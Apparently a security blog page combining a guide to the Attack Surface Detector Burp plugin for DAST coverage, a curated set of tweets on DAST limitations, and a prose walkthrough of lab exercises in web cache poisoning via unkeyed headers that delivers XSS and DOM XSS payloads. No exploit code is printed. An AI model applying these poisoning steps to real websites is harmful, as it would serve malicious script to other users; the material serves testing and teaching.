In this post, we will see how Attack Surface Detector (ASD) can be used to expand the attack surfaces of a web application. This is useful in improving test coverage of many Dynamic Application Security Testing (DAST) tools. As I have pointed out in this post, many DAST tools are not able to identify some attack surfaces during the spidering / crawling stage.
I will not go through how to install ASD.
First, clone this project and then run it. You will need to use Java 8. If you are using Java 11, then set JAVA_HOME and PATH to Java 8 (JDK).
Please follow this video first on how to install ASD extension in Burp Suite.
In the screenshot below, we can see that Target > Site map is showing the highlighted endpoints are generated from ASD. Select the highlighted endpoints and run an active scan.
We can see that Cross-site Scripting are detected in the imported assets from the source code.
To verify, we can load one of the attack payload to see the result.
Why ASD is useful?
There are times where the web application is so huge and no one have an accurate inventory of the endpoints. This means that there might be untested endpoints during DAST / Manual Testing. ASD helps to ensure at least the endpoints that are derived from the source code will be added to the testing.
Note that this a collection of tweets about DAST (excluding any specific company pitch). In general, it seems like many companies are unable to utilize the potential of DAST yet because of limitations in most of DAST tools. This opens up opportunity for people to create new DAST tool to overcome current problems.
Summary
Many AppSec folks are struggling to get any real value out of commercial DAST tools. Many problems include tools being unable to record Authentication properly and test coverage issues.
OWASP ZAP and Burp Enterprise Scanner are popular tools used in DAST automation in DevSecOps pipeline.
Some AppSec folks are proxying their QA stage to ZAP or Burp in order to improve test coverage of DAST scan.
“DAST biggest issue in modern apps is not exactly ‘testing’ or even ‘detecting’ vulns, but crawling the same website to identify to the attack surface.” ~ Jeremiah Grossman
OWASP Attack Surface Mapper tries to use SAST to pre-seed attack surface for DAST scan.
Interesting Tweets about DAST
Decide what ROI looks like and make sure the tool meets your expectations. If your apps are complicated might be hard for DAST scanner to cover them properly. Not convinced I have ever seen a company get real value out of DAST. Maybe just make sure your pentester is uses Burp/ZAP
— Josh Grossman 👻 (tghosth) (@JoshCGrossman) June 4, 2020
I have experience with Netsparker, and. Wracked DAST. Honestly, depending on your environment and whose managing the tool I’d just go with BurpSuite Enterprise. DAST is fairly limited anyways.
This maybe controversial, but another point that came up w/ @clintgibler is that orgs are having trouble seeing value of DAST tools. Suspect coverage, problematic depth, FPs, and a high price tag make ppl think twice. #appsec
This talk gives some examples of why good DAST coverage on modern web apps is fundamentally hard: https://t.co/pL4AWlCgQy
Many companies using C/C++ are adopting fuzzing, which is 💯@thedavidbrumley Do you think fuzzing provides value for non-C/C++ repos e.g. Python, Java…?
Coverage isn't the goal. Finding real bugs is. And if an automatic tool can increase your code coverage by 20% without having to resource a developer to do it, that seems like a win (that static analysis can't do).
I have long wanted to setup burpsuite to be the proxy for all tests used for QA and then allow it to run the attacker mode. Now that they have a headless option, I wonder how it would do. Since QA is likely hitting most endpoints, the tool knows endpoints and params to fuzz.
I know a number of AppSec teams have tried proxying integration tests through Burp then fuzz/attack mode, and found that it provides at least some baseline coverage.
Won't necessarily help with multi-step flows, but might be worth playing with.
Noooooooo you can't just point a DAST tool at a modern web application and expect it to be able to find all the content and test it for complex vulnerabilities
But they've been doing that for 15 years. Still none that I've seen actually do a good job of injesting and merging data from outside their tool (i.e. pen-tests, DAST tools, RASP tools, etc). Its frustrating because I've seen so many refer to running scans as their VM program.
— Alyssa Miller (Speaking at All Things Open) (@AlyssaM_InfoSec) May 14, 2020
I disagree. DAST is not perfect, but as it is often the last check prior to going live, it is hugely impirtant. If your company uses manual testing, that could be an alternative. As far as cost, use the popular open source tool #OWASP ZAProxy https://t.co/8ba6UDZdUN
IAST can give some of the benefits of DAST when used in the pipeline. You get speed but can still miss out on the coverage of DAST. You can "fail forward" by pushing to production after passing SAST&DAST scans and then run an asynchronous DAST scan and fix issues on next deploy.
That says that you don't know that your tool has failed you. It has. Did it fail to scan a SPA because it couldn't read routes? Did you have one where authentication stopped working and it ran for a week unauthenticated? Did your DAST tool ever find an IDOR vuln? 5/16
Previous oodles of data (defect densities, "what finds what", & measures related to remediation) lead me an opinion:
Activities (i.e. DAST, threat modeling, or tool du jour) don't tie directly to effectiveness. Effectiveness results from combining activities into capabilities.
Wonder why Vuln Management sucks? A test scan of 14 hosts with NO critical vulns takes 1hr+ and results in … a 571 page PDF. FIVE HUNDERD SEVENTY ONE PAGES???? This is insane. pic.twitter.com/R65KpTNIx6
It's more that the appsec toolsets themselves are integrating into the sdlc as it exists today (highly iterative), so SAST/SCA built into the IDE, invoked at check in, etc…DAST/IAST running continously in test or kicked off by a build tool, etc.
Whenever DAST vendors hmu I tell them to create a segment account (free), run their tool, send me the results, and if they're good we can talk. So far nobody has done this, not sure if it's because their results are bad or if they just aren't even trying.
I think it depends on the team. In my experience, some only want to make sure that the DAST tool doesn't log a new finding for every time a scan is run, others do want it to be collapsed. I know devs love smaller tickets, so something with 53 things to fix across all code…
DAST is meant to find vulnerabilities that adversaries may exploit. SAST is meant to find those same vulnerabilities earlier in the SDLC — but does it really? What’s the best data-backed evidence available in order to support or refute this claim? My search results are sparse.
When evaluating DAST vendors we struggled to find one that could authenticate to our app, and those that did limped through spidering. That sector has not kept up with single-page React apps.
A novice bug bounty hunter with Burp is the new DAST.
Proxying your acceptance tests through ZAP (or Burp) provides it with surface area for attacks. I agree, it's hard for these tools to get the full grasp of the surface area. That's why it's important to use a tool that is flexible & scriptable
DAST is anything but useless. For example it's tremendously helpful in complex application where the relationships between "code actually run in the browser" and "code in the repo" is anything but obvious. That's most modern apps.
This is an interesting tool, which used the power of SAST to feed DAST tools. Thinking about it – isn't the same as using OpenAPI/Swagger to feed DAST tools? What is the difference? https://t.co/v0aMD0rlgP
1. The Tool – What is/are the tools that map to the target tech stack 2. Deployment environment – Are scans intended for Dev, Integration or Staging 3. Time – How much time can be spared within the release cycle
Any one tool for API analysis is incomplete. A combo of IAST, DAST, Swagger, Manual investigation and other tools is what I see most mature shops (with good risk management) doing.
It's probably high time we saw some decent comparative analysis of DAST products, unless there's already some out there. There's room for everyone in the space, I think, but I also think it would be worth a look at the different qualities.#AppSechttps://t.co/DU30agOqDD
IME, highly depends on DAST training and complexity of target being analyzed. Scan blind and go will result in most vulns being found by SAST. If you train DAST through selenium, swagger, and proxy logs, the two will relatively even. Neither will detect biz logic flaws.
My only concern with ZAP is if junior level AppSec engineers will be able to set it up, embed it into the CI environment, parse the results and provide enough info to sw dev teams (attack replay) to fix the issues found. Thoughts?
I've been anecdotally tracking the effectiveness of DAST (web app security scanners) for years. @Burp_Suite 's active scanner and @ArachniScanner are still my 100% front-runners.
Ayup. DAST biggest issue in modern apps is not exactly ‘testing’ or even ‘detecting’ vulns, but crawling the same website to identify to the attack surface.
Proxying your acceptance tests through ZAP (or Burp) provides it with surface area for attacks. I agree, it's hard for these tools to get the full grasp of the surface area. That's why it's important to use a tool that is flexible & scriptable
Attack Surface Detector (ASD) Provides complete picture of web app’s exposed attack surface. Output used to “pre-seed” DAST tools for more thorough pen testing. Plugin available in the Portswigger Burp BApp Store. Download https://t.co/D48XBeAGHc@Burp_Suite@BApp_Store#PenTest
There is a lot of potential for product security teams to write passive/active scanner checks to avoid regressions or cover similar vulns – however the number of companies having dynamic testing as part of the CI/CD is still too small
These problems are not unique to Burp. The DAST market is wrought with products that can't handle modern application architecture, and I don't know of a single one that can. They are trying to accomplish a near impossible task. (5/10)
DAST solutions simply cannot effectively discover modern applications, and even if they could, cannot analyze with the context that is needed to discover authentication, authorization, session management, and business logic issues. (8/10)
Slow feedback loops in SAST, DAST, penetration tests, etc. things that force a leftward movement (a reset) in the pipeline are the problem. Feedback must be immediate, and the path for getting the feedback has to connect with the developer's existing environment. /FIN
— Alyssa Miller (Speaking at All Things Open) (@AlyssaM_InfoSec) September 16, 2020
An attacker can use Web Cache Poisoning technique to send malicious response to other users. The poisoning will happen when certain unkeyed inputs are not validated by the application and allowing the malicious response to be cached.
In the request, the attacker discovered that the X-Forwarded-Host value will be reflected in response. The application tries to load a tracking.js file from cache resources. When the attacker passes a specific host in X-Forwarded-Host parameter, the tracking.js file will be loaded from another path <malicious host>/resources/js/tracking.js. Consequently, this allows the attacker to control the content of tracking.js file and load malicious JavaScript (potentially leading to issues such as XSS).
In most situations, you will need to guess the unkeyed header. If you are using Burp Suite, then Paraminer will be a useful plugin to use.
First, go to the Target tab and select the paths in scope. Then right click on all these selected paths and click Guess Header.
If you are using Burp Pro, then you can see the result appearing in Dashboard - Issue activity.
Some sites may use the Vary header in the response to decide when to use the cached response or to refresh the response from the server. In the lab example, we can see that User-Agent is used to decide when the cached is used. To target your victim, you will need to know their User-Agent and then use the User-Agent values in your poison payload.
In our poison request, we have used X-Host and the victim’s User-Agent. Keep sending the request until you see the X-Cache is hit
In the Vary header, we see that User-Agent is used to decide the cache response decision.
In this example, we see how Web Cache Poisoning can cause DOM XSS in an application. In some cases, an application is taking some properties value from a JSON and then use the value dynamically in a DOM. The assumption is that these properties values can be trusted since they are controlled by the application. However if an application is susceptible to Web Cache Poisoning, then these properties value can be controlled by the attacker.
In the example, we first see that that there is a host injection issue. If you use X-Forwarded-Host, then the injected host value will be reflected in the response.
In the response, we can also see that the injected host name will be used for retrieving a JSON value. Using the given exploit server (in the lab), we can see the access log showing that a user is making a GET request to retrieve geolocate.json file.
If we examine the JavaScript carefully, we can see that the country value is taken from the JSON file and then assigned to innerHTML. This is a classic DOM XSS attack surface to take note.
After doing some tracing of the original JSON value, we can see that there is a property called ‘country’ which contains the value that will be passed to the innerHTML.
UI showing the JSON value
Since we found the attack surface, we can now create a JSON file in the exploit server. This will return a JSON which contains the DOM XSS payload. Access-Control-Allow-Origin need to be wildcard in order for the object to be shared with the application.
After this is completed, then we can see that the Web Cache Poisoning will be successful and the DOM-XSS payload will be executed.